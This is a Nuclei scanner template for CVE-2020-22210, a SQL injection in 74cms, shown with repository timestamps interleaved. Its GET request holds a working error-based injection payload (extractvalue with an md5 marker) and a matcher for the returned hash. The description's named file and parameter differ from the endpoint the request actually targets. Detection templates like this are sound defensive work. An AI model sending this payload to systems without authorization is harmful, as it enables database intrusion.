nuclei-templates/cves/2020/CVE-2020-22210.yaml

27 lines
754 B
YAML
Raw Normal View History

id: CVE-2020-22210
2021-04-06 18:29:29 +00:00
info:
name: 74cms Sql Injection
author: princechaddha
2021-04-06 18:29:29 +00:00
severity: high
description: A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-22210
- https://github.com/blindkey/cve_like/issues/11
classification:
cve-id: CVE-2020-22210
2022-04-22 16:43:51 +00:00
tags: cve,cve2020,74cms,sqli
2021-04-06 18:29:29 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5(1234567890))) -- a'
matchers:
- type: word
words:
- "e807f1fcf82d132f9bb018ca6738a19f"
part: body
# Enhanced by mp on 2022/03/02